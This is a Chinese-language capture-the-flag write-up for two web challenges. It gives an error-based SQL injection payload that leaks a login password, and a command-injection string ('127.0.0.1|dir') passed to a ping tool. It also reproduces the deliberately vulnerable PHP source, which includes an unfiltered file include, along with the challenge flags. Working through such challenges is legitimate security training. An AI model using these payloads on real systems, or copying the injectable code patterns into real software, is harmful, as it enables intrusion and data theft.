偶然看到的比賽,我等渣渣跟風做兩題,剩下的題目工作太忙沒有時間繼續做。
第1題 sql注入:
題目知識
考察sql注入知識,題目地址:http://101.200.145.44/web1//index.php
做題過程
第一步:注入Playload
user=flag&pass=' or updatexml(1,concat(0x7e,(select pw from user limit 1,1 )),0)# '
第二步:注入效果
Masel's secure site 重置數據庫 Error: XPATH syntax error: '~*75DBBA7B5806E761411'
第三步:獲取源碼,得知用戶名為flag,使用注入出的密碼登錄可得到flag
用戶名為flag 密碼為:*75DBBA7B5806E761411
Loggedin!Flag:5a2f5d8f-58fa-481b-a19f-9aab97ba6a4b
相關源碼
http://101.200.145.44/web1//index.php.txt
<html>
<head>
Masel's secure site
</head>
<body>
<a href="setup-db.php">重置數據庫</a>
<?php
include("auth.php");
$servername = $host;
$username = $dbuser;
$password = $dbpass;
$database = $dbname;
error_reporting(0);
if($_POST["user"] && $_POST["pass"]) {
$conn = mysqli_connect($servername, $username, $password, $database);
if ($conn->connect_error) {
die("Connection failed: " . mysqli_error($conn));
}
$user = $_POST["user"];
$pass = $_POST["pass"];
$sql = "select user from user where pw='$pass'";
//echo $sql;
$query = mysqli_query($conn,$sql);
if (!$query) {
printf("Error: %s\n", mysqli_error($conn));
exit();
}
$row = mysqli_fetch_array($query);
//echo $row["pw"];
if ($row[user]){
if ($row[user] == "flag" && $user=="flag") {
echo "<p>Logged in! Flag: ****************** </p>";
}
else{
echo "<p>Password is right, but it's not for the flag </p>";
}
}
else {
echo("<p>Wrong password!</p>");
}
}
?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.php.txt">Source</a>
</html>
key
Loggedin!Flag:5a2f5d8f-58fa-481b-a19f-9aab97ba6a4b
第2題:命令執行
題目知識
考察命令執行的繞過,題目地址:http://101.200.145.44/web2//index.php
做題過程
第一步:得到文件名
127.0.0.1|dir
或
127.0.0.1&&dir
執行結果
1C9976C230DA289C1C359CD2A7C02D48 index.php index.php.txt
第二步:再次得到文件名
127.0.0.1|dir 1C9976C230DA289C1C359CD2A7C02D48
執行結果
flag.php
第三步:直接訪問
連接URL地址直接訪問http://101.200.145.44/web2/1C9976C230DA289C1C359CD2A7C02D48/flag.php
相關源碼
<?php
header("Content-type: text/html; charset=utf-8");
?>
<html>
<head>
<title></title>
</head>
<body>
<div align="center">
<h1 al>我剛做了一個ping命令的小工具,快試一下吧!</h1>
<div >
<p>請輸入目標IP</p>
<form name="ping" action="index.php" method="post">
<input type="text" name="ip" size="30">
<input type="submit" value="submit" name="submit">
</form>
</div>
<div>
</body>
</html>
<?php
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST[ 'ip' ];
if(preg_match('/dir|cd|^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/',$target))
{
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.iconv('GB2312', 'UTF-8',$cmd).'</pre>';
} else
{
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.iconv('GB2312', 'UTF-8',$cmd).'</pre>';
}
}
else
echo "輸入格式不正確!";
}
if( isset($_GET['file']))
{
include($_GET['file']);
}
?>
key
flag{0d143dcd-5b29-4f4f-9b16-73665aeb45a8}